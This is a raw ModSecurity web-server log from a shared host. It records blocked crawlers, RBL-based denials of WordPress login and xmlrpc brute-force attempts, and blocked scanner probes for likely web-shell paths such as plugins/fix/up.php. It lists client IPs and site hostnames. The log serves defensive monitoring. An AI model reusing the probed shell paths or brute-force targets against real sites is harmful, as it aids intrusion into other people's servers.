[Tue May 26 17:09:14.803322 2026] [security2:error] [pid 860158:tid 860411] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGYoYFlz_JJsUnscKfxAAAAQA"]
[Tue May 26 17:09:16.345921 2026] [security2:error] [pid 860158:tid 860346] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGY4YFlz_JJsUnscKf9AAAAL8"]
[Tue May 26 17:09:17.831834 2026] [security2:error] [pid 860158:tid 860382] [client 114.119.144.29:24395] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "newdental.com.co"] [uri "/"] [unique_id "ahWGZYYFlz_JJsUnscKgJwAAAOM"], referer: http://newdental.com.co/?ucci/5908821063892286l11a/cbfceg39974c.undeserver
[Tue May 26 17:09:19.473381 2026] [security2:error] [pid 860158:tid 860376] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGZ4YFlz_JJsUnscKgRQAAAN0"]
[Tue May 26 17:09:20.764944 2026] [security2:error] [pid 860158:tid 860328] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGaIYFlz_JJsUnscKgZwAAAK0"]
[Tue May 26 17:09:21.165681 2026] [security2:error] [pid 860158:tid 860370] [client 203.194.101.7:57614] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGaYYFlz_JJsUnscKgdQAAANc"]
[Tue May 26 17:09:21.165834 2026] [security2:error] [pid 860158:tid 860370] [client 203.194.101.7:57614] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGaYYFlz_JJsUnscKgdQAAANc"]
[Tue May 26 17:09:22.564788 2026] [security2:error] [pid 860158:tid 860389] [client 104.23.223.44:9681] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "blettclms.com"] [uri "/wp-admin/install.php"] [unique_id "ahWGaoYFlz_JJsUnscKgpAAAAOo"]
[Tue May 26 17:09:22.752685 2026] [security2:error] [pid 860158:tid 860338] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGaoYFlz_JJsUnscKgrAAAALc"]
[Tue May 26 17:09:23.590061 2026] [security2:error] [pid 860158:tid 860351] [client 66.146.232.188:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWGa4YFlz_JJsUnscKgzQAAAMQ"], referer: https://www.anujtradingco.com/
[Tue May 26 17:09:23.912645 2026] [security2:error] [pid 860158:tid 860373] [client 104.23.223.45:11364] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "blettclms.com"] [uri "/index.php/wp-admin/install.php"] [unique_id "ahWGa4YFlz_JJsUnscKgvwAA2jg"]
[Tue May 26 17:09:25.427398 2026] [security2:error] [pid 860158:tid 860356] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGbIYFlz_JJsUnscKg9gAAAMk"]
[Tue May 26 17:09:25.950233 2026] [security2:error] [pid 860158:tid 860323] [client 47.128.44.106:48350] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.operatives.org.in"] [uri "/robots.txt"] [unique_id "ahWGbYYFlz_JJsUnscKhFAAAAKg"]
[Tue May 26 17:09:26.117554 2026] [security2:error] [pid 860158:tid 860337] [client 66.146.232.188:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWGboYFlz_JJsUnscKhFwAAALY"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1242310&moderation-hash=12db71cca33677fe78974b191f9624fa
[Tue May 26 17:09:27.811402 2026] [security2:error] [pid 860158:tid 860403] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGb4YFlz_JJsUnscKhdAAAAPg"]
[Tue May 26 17:09:28.033262 2026] [security2:error] [pid 860158:tid 860372] [client 86.127.230.250:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGb4YFlz_JJsUnscKhhAAAANk"]
[Tue May 26 17:09:29.935407 2026] [security2:error] [pid 860158:tid 860331] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGcYYFlz_JJsUnscKhsQAAALA"]
[Tue May 26 17:09:30.416136 2026] [security2:error] [pid 860158:tid 860321] [client 66.146.232.188:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWGcoYFlz_JJsUnscKhxAAAAKY"], referer: https://anujtradingco.com
[Tue May 26 17:09:30.939835 2026] [security2:error] [pid 860158:tid 860410] [client 114.119.131.206:39407] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahWGcoYFlz_JJsUnscKhzAAAAP8"], referer: http://haddingtonwines.com/cart?remove_item=124461dcd3571e6674ec4e0e140cc298
[Tue May 26 17:09:31.548165 2026] [security2:error] [pid 860158:tid 860299] [client 203.194.101.7:57946] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGc4YFlz_JJsUnscKh1AAAAJA"]
[Tue May 26 17:09:31.548266 2026] [security2:error] [pid 860158:tid 860299] [client 203.194.101.7:57946] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGc4YFlz_JJsUnscKh1AAAAJA"]
[Tue May 26 17:09:32.069062 2026] [security2:error] [pid 860158:tid 860318] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGc4YFlz_JJsUnscKh2QAAAKM"]
[Tue May 26 17:09:34.022754 2026] [security2:error] [pid 860158:tid 860410] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGdYYFlz_JJsUnscKiAAAAAP8"]
[Tue May 26 17:09:34.784617 2026] [security2:error] [pid 860158:tid 860179] [remote 54.38.29.86:46340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahWGdoYFlz_JJsUnscKiGQAA6RQ"]
[Tue May 26 17:09:35.368787 2026] [security2:error] [pid 860158:tid 860344] [client 103.174.5.177:62310] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWGdoYFlz_JJsUnscKiFQAAAL0"]
[Tue May 26 17:09:35.714042 2026] [security2:error] [pid 860158:tid 860334] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGd4YFlz_JJsUnscKiMgAAALM"]
[Tue May 26 17:09:36.091705 2026] [security2:error] [pid 860158:tid 860185] [remote 193.42.61.12:34668] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWGd4YFlz_JJsUnscKiPgAAwxo"]
[Tue May 26 17:09:38.465347 2026] [security2:error] [pid 860158:tid 860357] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGeoYFlz_JJsUnscKicwAAAMo"]
[Tue May 26 17:09:38.586832 2026] [security2:error] [pid 860158:tid 860363] [client 23.229.83.84:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWGeoYFlz_JJsUnscKihgAAANA"], referer: https://www.anujtradingco.com/
[Tue May 26 17:09:38.725604 2026] [security2:error] [pid 860158:tid 860202] [remote 163.223.13.54:50852] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 54.13.223.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWGeoYFlz_JJsUnscKihwAAuis"]
[Tue May 26 17:09:38.803295 2026] [security2:error] [pid 860158:tid 860213] [remote 115.79.143.180:43970] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.143.79.115.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWGeoYFlz_JJsUnscKiiQAA8jY"]
[Tue May 26 17:09:39.593599 2026] [security2:error] [pid 860158:tid 860381] [client 23.229.83.84:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWGe4YFlz_JJsUnscKipQAAAOI"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1451658&moderation-hash=e1d6a6b8e4284daf45d45ed63eb70ee7
[Tue May 26 17:09:40.539561 2026] [security2:error] [pid 860158:tid 860352] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGfIYFlz_JJsUnscKixAAAAMU"]
[Tue May 26 17:09:42.133749 2026] [security2:error] [pid 860158:tid 860407] [client 203.194.101.7:58290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGfYYFlz_JJsUnscKi5QAAAPw"]
[Tue May 26 17:09:42.133882 2026] [security2:error] [pid 860158:tid 860407] [client 203.194.101.7:58290] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGfYYFlz_JJsUnscKi5QAAAPw"]
[Tue May 26 17:09:42.760773 2026] [security2:error] [pid 860158:tid 860354] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGfoYFlz_JJsUnscKi8AAAAMc"]
[Tue May 26 17:09:45.005456 2026] [security2:error] [pid 860158:tid 860373] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGgIYFlz_JJsUnscKjLAAAANo"]
[Tue May 26 17:09:45.941466 2026] [security2:error] [pid 860158:tid 860239] [remote 176.31.139.17:45704] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "athelstan.org.in"] [uri "/robots.txt"] [unique_id "ahWGgYYFlz_JJsUnscKjTgAA6lA"]
[Tue May 26 17:09:45.941672 2026] [security2:error] [pid 860158:tid 860389] [client 176.31.139.17:45704] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "athelstan.org.in"] [uri "/robots.txt"] [unique_id "ahWGgYYFlz_JJsUnscKjTgAA6lA"]
[Tue May 26 17:09:47.123589 2026] [security2:error] [pid 860158:tid 860349] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGgoYFlz_JJsUnscKjXwAAAMI"]
[Tue May 26 17:09:47.390345 2026] [security2:error] [pid 860158:tid 860253] [remote 167.114.139.80:22794] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "athelstan.org.in"] [uri "/"] [unique_id "ahWGg4YFlz_JJsUnscKjbAAA814"]
[Tue May 26 17:09:47.390610 2026] [security2:error] [pid 860158:tid 860398] [client 167.114.139.80:22794] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "athelstan.org.in"] [uri "/"] [unique_id "ahWGg4YFlz_JJsUnscKjbAAA814"]
[Tue May 26 17:09:48.322924 2026] [security2:error] [pid 860158:tid 860291] [client 74.7.228.5:56004] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahWGhIYFlz_JJsUnscKjfAAAAIg"]
[Tue May 26 17:09:48.579575 2026] [security2:error] [pid 860158:tid 860412] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGhIYFlz_JJsUnscKjeAAAAQE"]
[Tue May 26 17:09:48.929022 2026] [security2:error] [pid 860158:tid 860260] [remote 74.7.241.58:50902] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWGhIYFlz_JJsUnscKjgQABAGU"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 17:09:49.210492 2026] [security2:error] [pid 860158:tid 860288] [client 216.244.66.243:32814] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "wphotonics.com.md-74.webhostbox.net"] [uri "/"] [unique_id "ahWGhYYFlz_JJsUnscKjiAAAAIU"]
[Tue May 26 17:09:49.210672 2026] [security2:error] [pid 860158:tid 860288] [client 216.244.66.243:32814] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "wphotonics.com.md-74.webhostbox.net"] [uri "/"] [unique_id "ahWGhYYFlz_JJsUnscKjiAAAAIU"]
[Tue May 26 17:09:49.607873 2026] [security2:error] [pid 860158:tid 860160] [remote 159.89.192.15:55820] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.192.89.159.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWGhIYFlz_JJsUnscKjgAAApgE"]
[Tue May 26 17:09:50.411464 2026] [security2:error] [pid 860158:tid 860235] [remote 62.181.233.16:36766] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 16.233.181.62.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWGhYYFlz_JJsUnscKjmwAA8Uw"]
[Tue May 26 17:09:50.629020 2026] [security2:error] [pid 860158:tid 860266] [remote 216.73.216.30:33581] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWGhoYFlz_JJsUnscKjrgAA6Gs"]
[Tue May 26 17:09:50.799931 2026] [security2:error] [pid 860158:tid 860300] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGhoYFlz_JJsUnscKjpAAAAJE"]
[Tue May 26 17:09:52.382981 2026] [security2:error] [pid 860158:tid 860414] [client 203.194.101.7:58626] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGiIYFlz_JJsUnscKjxwAAAQM"]
[Tue May 26 17:09:52.383118 2026] [security2:error] [pid 860158:tid 860414] [client 203.194.101.7:58626] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGiIYFlz_JJsUnscKjxwAAAQM"]
[Tue May 26 17:09:53.587783 2026] [security2:error] [pid 860158:tid 860410] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGiYYFlz_JJsUnscKj2gAAAP8"]
[Tue May 26 17:09:55.817502 2026] [security2:error] [pid 860158:tid 860330] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGi4YFlz_JJsUnscKkDwAAAK8"]
[Tue May 26 17:09:55.829370 2026] [security2:error] [pid 860158:tid 860380] [client 45.154.98.76:54572] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWGi4YFlz_JJsUnscKkGQAAAOE"], referer: www.google.com
[Tue May 26 17:09:55.880206 2026] [security2:error] [pid 860158:tid 860166] [remote 216.73.216.30:64712] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWGi4YFlz_JJsUnscKkHwAAwwc"]
[Tue May 26 17:09:55.923728 2026] [security2:error] [pid 860158:tid 860402] [client 45.154.98.76:54580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-plain.php"] [unique_id "ahWGi4YFlz_JJsUnscKkHQAAAPc"], referer: www.google.com
[Tue May 26 17:09:55.926465 2026] [security2:error] [pid 860158:tid 860307] [client 45.154.98.76:54585] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWGi4YFlz_JJsUnscKkHAAAAJg"], referer: www.google.com
[Tue May 26 17:09:56.078084 2026] [security2:error] [pid 860158:tid 860395] [client 45.154.98.76:54595] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWGi4YFlz_JJsUnscKkJAAAAPA"]
[Tue May 26 17:09:56.175927 2026] [security2:error] [pid 860158:tid 860361] [client 45.154.98.76:54572] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWGjIYFlz_JJsUnscKkKgAAAM4"], referer: www.google.com
[Tue May 26 17:09:56.215918 2026] [security2:error] [pid 860158:tid 860337] [client 45.154.98.76:54880] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/kcreqstx.php"] [unique_id "ahWGjIYFlz_JJsUnscKkLgAAALY"], referer: www.google.com
